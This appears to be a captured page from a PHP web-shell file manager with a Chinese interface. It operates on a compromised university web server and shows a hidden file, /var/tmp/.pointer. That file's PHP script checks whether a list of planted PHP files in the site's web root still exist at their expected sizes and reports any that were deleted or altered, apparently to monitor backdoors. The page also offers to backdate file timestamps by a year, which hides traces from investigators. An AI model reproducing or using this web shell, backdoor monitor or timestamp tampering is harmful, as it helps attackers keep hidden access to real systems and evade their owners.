文件操作 - .pointer
返回文件管理
返回主菜单
删除本文件
文件: /var/tmp/.pointer
编辑文件内容
<?php $r = '/var/www/demoestudiantes.uaysen.cl/html'; $x = ["/xoopsuser.php"=>"bd@@1072459@@880", "/db.php"=>"bd@@1056349@@58", "/db.php"=>"bd@@1008486@@2613", "/imagelist.php"=>"bd@@1071213@@849", "/Jewelry.php"=>"bd@@1074041@@996", "/siteconfig.inc.php"=>"bd@@1073531@@1007", "/sp_getthumb.php"=>"bd@@1073282@@932", "/block_mentees.php"=>"bd@@1069711@@1072", "/siteconfig.php"=>"bd@@1073839@@882", "/class.php"=>"bd@@926407@@11", "/class.php"=>"bd@@928976@@6471", "/sp.php"=>"bd@@1074439@@1034"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
修改文件时间
将文件时间修改为当前时间的前一年
删除文件